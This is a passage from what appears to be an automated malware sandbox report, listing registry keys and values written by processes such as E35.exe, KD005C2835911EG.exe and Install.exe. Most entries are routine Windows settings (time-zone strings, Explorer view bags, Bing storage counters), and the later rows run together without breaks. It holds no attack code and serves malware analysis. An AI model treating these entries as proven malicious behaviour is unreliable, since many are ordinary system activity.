Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" |
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Toolbar | explorer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" |
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\IESettingSync | KD005C2835911EG.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Toolbar |
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" |
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser |
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout =
Modifies data under HKEY_USERS 64 IoCs
Processes:
E35.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | E35.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" | E35.exe
-
Modifies registry class 64 IoCs
Processes:
explorer.exe, SearchApp.exe, Install.exe, chrome.exe
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" |
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU |
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "115501" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "600" |
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" |
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "5752" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2247" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2247" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "187510" | SearchApp.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000 |
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com | SearchApp.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!mi = 2c0000000000000001000000ffffffffffffffffffffffffffffffff280000002000000058030000a1020000 |
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 |
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" |
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0}\Instance\ |
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3 |
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9} |
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\6 |
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | Install.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "32882" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "11000" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "67446" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "68509" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "187510" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "67925" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "67925" | SearchApp.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3\MRUListEx = ffffffff |
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 0400000003000000020000000100000000000000ffffffff |
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" |
Set value (data) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 |
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2856" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "3743" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "35125" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "5388" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1752" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "1752" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "77892" | SearchApp.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209" |
Set value (int) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "136017" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "196252" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2295526160-1155304984-640977766-1000\{201B5462-ABFE-45D8-8476-87C8AF20704C} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2894" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "11000" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "67446" SearchApp.exe Set value (data) 
\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "64855" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "84200" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "171663" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "198788" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local 
Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "228785" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MaxPos1280x720x96(1).y = "4294967295" Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local 